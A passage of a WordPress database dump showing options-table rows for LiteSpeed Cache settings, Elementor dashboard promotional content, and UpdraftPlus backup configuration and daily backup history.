(7917,'litespeed.conf.cdn-quic','','auto'),(7918,'litespeed.conf.cdn-cloudflare','','auto'),(7919,'litespeed.conf.cdn-cloudflare_email','','auto'),(7920,'litespeed.conf.cdn-cloudflare_key','','auto'),(7921,'litespeed.conf.cdn-cloudflare_name','','auto'),(7922,'litespeed.conf.cdn-cloudflare_zone','','auto'),(7923,'litespeed.conf.cdn-cloudflare_clear','','auto'),(7924,'litespeed.conf.cdn-mapping','[{\"url\":\"\",\"inc_img\":\"1\",\"inc_css\":\"1\",\"inc_js\":\"1\",\"filetype\":[\".aac\",\".css\",\".eot\",\".gif\",\".jpeg\",\".jpg\",\".js\",\".less\",\".mp3\",\".mp4\",\".ogg\",\".otf\",\".pdf\",\".png\",\".svg\",\".ttf\",\".webp\",\".woff\",\".woff2\"]}]','auto'),(7925,'litespeed.conf.cdn-attr','[\".src\",\".data-src\",\".href\",\".poster\",\"source.srcset\"]','auto'),(7926,'litespeed.conf.qc-nameservers','','auto'),(7927,'litespeed.conf.qc-cname','','auto'),(7928,'litespeed.conf.debug-disable_tmp','0','auto'),(7929,'litespeed.cloud._summary','{\"curr_request.ver_check\":0,\"last_request.ver_check\":1788448192,\"news.utime\":1771807375,\"curr_request.news\":0,\"last_request.news\":1771807375,\"curr_request.d\\/dash\":0,\"mini_html\":{\"news_dash_guest\":\"\",\"ttl.news_dash_guest\":1766011172,\"promo_mini\":\"\",\"ttl.promo_mini\":1765953572},\"last_request.d\\/dash\":1765867172}','auto'),(7930,'litespeed.purge.queue','-1','auto'),(7931,'litespeed.purge.queue2','-1','auto'),(7932,'litespeed.gui.lscwp_whm_install','-1','auto'),(7933,'litespeed.gui.dismiss','-1','auto'),(7934,'litespeed.data.upgrading','-1','auto'),(7935,'litespeed.admin_display.messages','-1','auto'),(7936,'litespeed.gui._summary','{\"new_version\":1766471963,\"score\":1767076763,\"new_version.last_check\":1771807374,\"new_version.v\":\"7.7\"}','auto'),(8135,'litespeed.optimize.timestamp_purge_css','1788448191','auto'),(14561,'wp_calendar_block_has_published_posts','1','auto'),(41222,'wpseo_tracking_only','a:3:{s:25:\"task_list_first_opened_on\";s:0:\"\";s:22:\"task_first_actioned_on\";s:0:\"\";s:36:\"frontend_inspector_first_actioned_on\";s:0:\"\";}','auto'),(41238,'_elementor_home_screen_data','a:2:{s:7:\"timeout\";i:1771811885;s:5:\"value\";s:12470:\"{\"top_with_licences\":[{\"license\":[\"free\"],\"title_small\":\"Hi!\",\"title\":\"Unleash your imagination with Elementor\",\"description\":\"Start building your website with Elementor\'s no code drag & drop editor.\",\"button_create_page_title\":\"Create a Page\",\"button_watch_title\":\"Watch a guide\",\"button_watch_url\":\"https:\\/\\/www.youtube.com\\/watch?v=le72grP_Q6k&t=1s\",\"youtube_embed_id\":\"le72grP_Q6k?si=g2akyWNODL6usu6u\"},{\"license\":[\"pro\"],\"title_small\":\"Hi!\",\"title\":\"Unleash your imagination with Elementor\",\"description\":\"Now you\'ve got all the tools to start creating professional, high-performing websites - and that journey begins by creating your first page.\",\"button_create_page_title\":\"Create a Page\",\"button_watch_title\":\"Watch a guide\",\"button_watch_url\":\"https:\\/\\/www.youtube.com\\/watch?v=QdkDGrS8ZZs\",\"youtube_embed_id\":\"QdkDGrS8ZZs?si=s_VjZCQR6Fh1jgB5\"},{\"license\":[\"one\"],\"title_small\":\"Hi!\",\"title\":\"Unleash your imagination with Elementor\",\"description\":\"Now you\'ve got all the tools to start creating professional, high-performing websites - and that journey begins by creating your first page.\",\"button_create_page_title\":\"Create a Page\",\"button_watch_title\":\"Watch a guide\",\"button_watch_url\":\"https:\\/\\/www.youtube.com\\/watch?v=QdkDGrS8ZZs\",\"youtube_embed_id\":\"QdkDGrS8ZZs?si=s_VjZCQR6Fh1jgB5\"}],\"get_started\":[{\"license\":[\"free\"],\"header\":{\"title\":\"Jumpstart your web-creation\",\"description\":\"These quick actions will get your site airborne with a customized design.\"},\"repeater\":[{\"title\":\"Site Settings\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-settings.svg\"},{\"title\":\"Site Logo\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"settings-site-identity\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-logo.svg\"},{\"title\":\"Global Colors\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"global-colors\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-colors.svg\"},{\"title\":\"Global Fonts\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"global-typography\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-fonts.svg\"},{\"title\":\"Theme Builder\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor-app\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/theme-builder.svg\"},{\"title\":\"Popups\",\"title_small\":\"Customize\",\"url\":\"edit.php?post_type=elementor_library&page=popup_templates\",\"is_relative_url\":true,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/popups.svg\"},{\"title\":\"Custom Icons\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_icons\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-icons.svg\"},{\"title\":\"Custom Fonts\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_fonts\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-fonts.svg\",\"title_small_color\":\"text.tertiary\"}]},{\"license\":[\"pro\"],\"header\":{\"title\":\"Jumpstart your web-creation\",\"description\":\"These quick actions will get your site airborne with a customized design.\"},\"repeater\":[{\"title\":\"Site Settings\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-settings.svg\"},{\"title\":\"Site Logo\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"settings-site-identity\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-logo.svg\"},{\"title\":\"Global Colors\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-colors\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-colors.svg\"},{\"title\":\"Global Fonts\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-typography\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-fonts.svg\"},{\"title\":\"Theme Builder\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor-app\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/theme-builder.svg\"},{\"title\":\"Popups\",\"title_small\":\"Customize\",\"url\":\"edit.php?post_type=elementor_library&tabs_group=popup&elementor_library_type=popup\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/popups.svg\"},{\"title\":\"Custom Icons\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_icons\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-icons.svg\"},{\"title\":\"Custom Fonts\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_fonts\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-fonts.svg\"}]},{\"license\":[\"one\"],\"header\":{\"title\":\"Jumpstart your web-creation\",\"description\":\"These quick actions will get your site airborne with a customized design.\"},\"repeater\":[{\"title\":\"Site Settings\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-settings.svg\"},{\"title\":\"Site Logo\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"settings-site-identity\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-logo.svg\"},{\"title\":\"Global Colors\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-colors\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-colors.svg\"},{\"title\":\"Global Fonts\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-typography\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-fonts.svg\"},{\"title\":\"Theme Builder\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor-app\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/theme-builder.svg\"},{\"title\":\"Popups\",\"title_small\":\"Customize\",\"url\":\"edit.php?post_type=elementor_library&tabs_group=popup&elementor_library_type=popup\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/popups.svg\"},{\"title\":\"Custom Icons\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_icons\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-icons.svg\"},{\"title\":\"Custom Fonts\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_fonts\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-fonts.svg\"}]}],\"add_ons\":{\"hide_section\":[\"free\",\"essential\",\"pro\",\"one\"],\"header\":{\"title\":\"Expand your design toolkit\",\"description\":\"These plugins, add-ons, and tools, have been selected to streamline your workflow and maximize your creativity.\"},\"repeater\":[{\"file_path\":\"pojo-accessibility\\/pojo-accessibility.php\",\"title\":\"Ally - Web Accessibility. Simplified.\",\"url\":\"\",\"description\":\"Make your website more accessible with powerful tools to detect and fix issues, enhance usability, and create a better experience for all visitors.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/ally_logo.svg\",\"type\":\"wporg\"},{\"file_path\":\"site-mailer\\/site-mailer.php\",\"title\":\"Site Mailer\",\"url\":\"\",\"description\":\"Keep your WordPress emails out of the spam folder with improved deliverability and an easy setup\\u2014no need for an SMTP plugin or complicated configurations.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-mailer.svg\",\"type\":\"wporg\"},{\"file_path\":\"image-optimization\\/image-optimization.php\",\"title\":\"Image Optimizer\",\"url\":\"https:\\/\\/go.elementor.com\\/wp-dash-apps-author-uri-elementor-io\\/\",\"description\":\"Check out this incredibly useful plugin that will compress and optimize your images, giving you leaner, faster websites.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/image-optimizer.svg\",\"type\":\"wporg\"},{\"title\":\"Elementor AI\",\"url\":\"https:\\/\\/go.elementor.com\\/wp-dash-apps-author-uri-elementor-ai\\/\",\"description\":\"Boost creativity with Elementor AI. Craft & enhance copy, create custom CSS & Code, and generate images to elevate your website.\",\"button_label\":\"Let\'s go\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/elementor.svg\",\"type\":\"link\",\"condition\":{\"key\":\"introduction_meta\",\"value\":\"ai_get_started\"}}],\"footer\":{\"label\":\"Explore more add-ons\",\"file_path\":\"wp-admin\\/admin.php?page=elementor-apps\"}},\"sidebar_promotion_variants\":[{\"license\":[\"essential\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/essential-upgrade.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-advanced-home-sidebar-upgrade\\/\"}},{\"license\":[\"free\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/upgrade-free.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\"}},{\"license\":[\"expired\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/upgrade-free.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-expired\\/\"}},{\"license\":[\"free\"],\"is_enabled\":\"false\",\"type\":\"default\",\"data\":{\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\'s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/update-sidebar.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}},{\"license\":[\"pro\"],\"is_enabled\":\"false\",\"type\":\"default\",\"data\":{\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\'s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/update-sidebar.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}},{\"license\":[\"one\"],\"is_enabled\":\"false\",\"type\":\"default\",\"data\":{\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\'s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/update-sidebar.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}}],\"external_links\":[{\"label\":\"Help Center\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-question-mark.svg\",\"url\":\"https:\\/\\/elementor.com\\/help\\/\"},{\"label\":\"Youtube\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-youtube.svg\",\"url\":\"https:\\/\\/www.youtube.com\\/@Elementor\"},{\"label\":\"Facebook Community\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-community.svg\",\"url\":\"https:\\/\\/www.facebook.com\\/groups\\/Elementors\"},{\"label\":\"Blog\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-academic-hat.svg\",\"url\":\"https:\\/\\/elementor.com\\/blog\\/\"}]}\";}','off'),(41245,'updraft_remotesites','','on'),(41246,'updraft_migrator_localkeys','','on'),(41247,'updraft_central_localkeys','','on'),(41249,'updraft_autobackup_default','0','on'),(41250,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-5ac92b83b6f1aefac0102ab6890873f3\";a:4:{s:6:\"appkey\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:0:\"\";}}}','on'),(41251,'updraft_pcloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-92afcbc8da0193edfb36ee48c35af332\";a:0:{}}}','on'),(41252,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-606e7bf9bd930d4afe2b2c0474465245\";a:3:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"token\";s:0:\"\";}}}','on'),(41253,'updraftplus_tmp_googledrive_access_token','','on'),(41254,'updraftplus_dismissedautobackup','','on'),(41255,'dismissed_general_notices_until','','on'),(41256,'dismissed_review_notice','','on'),(41257,'dismissed_clone_php_notices_until','','on'),(41258,'dismissed_clone_wc_notices_until','','on'),(41259,'dismissed_season_notices_until','','on'),(41260,'updraftplus_dismissedexpiry','','on'),(41261,'updraftplus_dismisseddashnotice','','on'),(41262,'updraft_interval','daily','on'),(41263,'updraft_interval_increments','none','on'),(41266,'updraft_interval_database','daily','on'),(41267,'updraft_retain','1','on'),(41268,'updraft_retain_db','1','on'),(41269,'updraft_encryptionphrase','','on'),(41270,'updraft_service','','on'),(41271,'updraft_googledrive_clientid','','on'),(41272,'updraft_googledrive_secret','','on'),(41273,'updraft_googledrive_remotepath','','on'),(41274,'updraft_ftp','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-ae1704d9215f723809bf484bf3509bd0\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";i:1;}}}','on'),(41275,'updraft_backblaze','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-facebc8f8892b3f9ad533a34306c671b\";a:0:{}}}','on'),(41276,'updraft_server_address','','on'),(41277,'updraft_dir','','on'),(41278,'updraft_email','','on'),(41279,'updraft_delete_local','0','on'),(41280,'updraft_debug_mode','0','on'),(41281,'updraft_include_plugins','0','on'),(41282,'updraft_include_themes','0','on'),(41283,'updraft_include_uploads','0','on'),(41284,'updraft_include_others','0','on'),(41285,'updraft_include_wpcore','0','on'),(41286,'updraft_include_wpcore_exclude','','on'),(41287,'updraft_include_more','0','on'),(41288,'updraft_include_blogs','','on'),(41289,'updraft_include_mu-plugins','','on'),(41291,'updraft_include_others_exclude','','on'),(41292,'updraft_include_uploads_exclude','','on'),(41293,'updraft_lastmessage','The backup succeeded and is now complete (Sep 05 01:16:51)','on'),(41294,'updraft_googledrive_token','','on'),(41295,'updraft_dropboxtk_request_token','','on'),(41296,'updraft_dropboxtk_access_token','','on'),(41297,'updraft_adminlocking','','on'),(41298,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-1d570833e0bd290dec92a9a186f2dbcb\";a:3:{s:5:\"token\";s:0:\"\";s:5:\"email\";s:0:\"\";s:5:\"quota\";i:-1;}}}','on'),(41299,'updraft_retain_extrarules','a:0:{}','on'),(41300,'updraft_googlecloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-a346c95c6cd57fd33562d3f1f03cd15a\";a:0:{}}}','on'),(41301,'updraft_include_more_path','','on'),(41302,'updraft_split_every','25','on'),(41303,'updraft_ssl_nossl','0','on'),(41304,'updraft_backupdb_nonwp','0','on'),(41305,'updraft_extradbs','a:0:{}','on'),(41307,'updraft_last_backup','a:6:{s:26:\"nonincremental_backup_time\";i:1788571008;s:11:\"backup_time\";i:1788571008;s:12:\"backup_array\";a:3:{s:2:\"db\";s:47:\"backup_2026-09-05-0116_AMB18_60b2fbbd4dc0-db.gz\";s:7:\"db-size\";i:2573055;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"bff330d42238024a304188a499aa73b0892a9412\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"3eec41084d5c5d7fc8fb715a610a137eade4ec73d681386423aab656c069649c\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"60b2fbbd4dc0\";}','on'),(41308,'updraft_starttime_files','01:15','on'),(41309,'updraft_starttime_db','01:15','on'),(41310,'updraft_startday_db','0','on'),(41311,'updraft_startday_files','0','on'),(41312,'updraft_sftp','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-f102ac561bd595e565f8e0cb1366393c\";a:0:{}}}','on'),(41313,'updraft_s3','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-1b56b15da6cd901587104cd719db1aeb\";a:5:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:3:\"rrs\";s:0:\"\";s:22:\"server_side_encryption\";s:0:\"\";}}}','on'),(41314,'updraft_s3generic','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-8dfaa1c9f1814fe6bc82002741f61b7b\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','on'),(41315,'updraft_dreamhost','','on'),(41316,'updraft_s3generic_login','','on'),(41317,'updraft_s3generic_pass','','on'),(41318,'updraft_s3generic_remote_path','','on'),(41319,'updraft_s3generic_endpoint','','on'),(41320,'updraft_webdav','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-b80ab603b032fb155b2ca1d3663e2169\";a:0:{}}}','on'),(41321,'updraft_openstack','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-1a4ce5fdf44f1d607cba3823c4f68e87\";a:6:{s:4:\"user\";s:0:\"\";s:7:\"authurl\";s:0:\"\";s:8:\"password\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:4:\"path\";s:0:\"\";s:6:\"region\";s:0:\"\";}}}','on'),(41322,'updraft_onedrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-dbe34612feba7e791777656089ba8967\";a:0:{}}}','on'),(41323,'updraft_azure','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-e2f5875c80febe53f37d1dd7a94beacc\";a:0:{}}}','on'),(41324,'updraft_cloudfiles','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-fae85a535d6fe6ca35fb0c56e2e938b5\";a:5:{s:4:\"user\";s:0:\"\";s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:6:\"region\";N;}}}','on'),(41325,'updraft_cloudfiles_user','','on'),(41326,'updraft_cloudfiles_apikey','','on'),(41327,'updraft_cloudfiles_path','','on'),(41328,'updraft_cloudfiles_authurl','','on'),(41329,'updraft_ssl_useservercerts','0','on'),(41330,'updraft_ssl_disableverify','0','on'),(41331,'updraft_s3_login','','on'),(41332,'updraft_s3_pass','','on'),(41333,'updraft_s3_remote_path','','on'),(41334,'updraft_dreamobjects_login','','on'),(41335,'updraft_dreamobjects_pass','','on'),(41336,'updraft_dreamobjects_remote_path','','on'),(41337,'updraft_dreamobjects','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-d5ec0962a8f4b78c54da3d93044fc5f1\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','on'),(41338,'updraft_report_warningsonly','a:0:{}','on'),(41339,'updraft_report_wholebackup','a:0:{}','on'),(41340,'updraft_report_dbbackup','a:0:{}','on'),(41341,'updraft_log_syslog','0','on'),(41342,'updraft_extradatabases','','on'),(41343,'updraftplus_tour_cancelled_on','backup_now','on'),(41344,'updraftplus_version','1.26.7','on'),(41345,'updraft_dismiss_admin_warning_litespeed','','on'),(41346,'updraft_dismiss_admin_warning_pclzip','','on'),(41347,'updraft_dismiss_phpseclib_notice','','on');
INSERT INTO `IwGJ28BV_options` VALUES (41348,'updraft_backup_history','a:196:{i:1788571008;a:11:{s:2:\"db\";s:47:\"backup_2026-09-05-0116_AMB18_60b2fbbd4dc0-db.gz\";s:7:\"db-size\";i:2573055;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"bff330d42238024a304188a499aa73b0892a9412\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"3eec41084d5c5d7fc8fb715a610a137eade4ec73d681386423aab656c069649c\";}}s:5:\"nonce\";s:12:\"60b2fbbd4dc0\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788484632;a:11:{s:2:\"db\";s:47:\"backup_2026-09-04-0117_AMB18_37df8b0e9cbd-db.gz\";s:7:\"db-size\";i:2559213;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"37ddb95fad7951857c3e7ad26f0b1fdd747a16bb\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"da97fd2e8f04bf88f5cc10f322d207f2e567a2999d92ae306d3946ba06b060fb\";}}s:5:\"nonce\";s:12:\"37df8b0e9cbd\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788397891;a:11:{s:2:\"db\";s:47:\"backup_2026-09-03-0111_AMB18_11c4575dee35-db.gz\";s:7:\"db-size\";i:2549445;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"fb95cdb3fd8a46d4bd8f0e4ecd90bf53dada15ef\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"639b8df696258091621b3ccb7d214464ac0f6760ae7d9472d7a4c51b6429face\";}}s:5:\"nonce\";s:12:\"11c4575dee35\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788311988;a:11:{s:2:\"db\";s:47:\"backup_2026-09-02-0119_AMB18_0237328a97bc-db.gz\";s:7:\"db-size\";i:2546052;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a98f9a07dd6a31f1beff000ca29e112f8b46a7be\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"bfd05bc00c24e4d549c5aa69a9e2e4a1a97fefd4ae86209aa4bfdfbbfceac793\";}}s:5:\"nonce\";s:12:\"0237328a97bc\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788227139;a:11:{s:2:\"db\";s:47:\"backup_2026-09-01-0145_AMB18_3e81f59a1831-db.gz\";s:7:\"db-size\";i:2541292;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a95b740cd1b8922ff16e7e12dd2ba00ed6598584\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f4b167411b614baeace93cf4dc299b14cf6105104c75a0934b5d1290bae1c2e2\";}}s:5:\"nonce\";s:12:\"3e81f59a1831\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788139305;a:11:{s:2:\"db\";s:47:\"backup_2026-08-31-0121_AMB18_7a0e4af4d9a3-db.gz\";s:7:\"db-size\";i:2540126;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"cb7abba33d181ed56ff5c40bacb21dd2945289a2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"4a00856d1efac0eb65e82afc01c033358d81bdf4b0e6c0417684d7f300652c4c\";}}s:5:\"nonce\";s:12:\"7a0e4af4d9a3\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}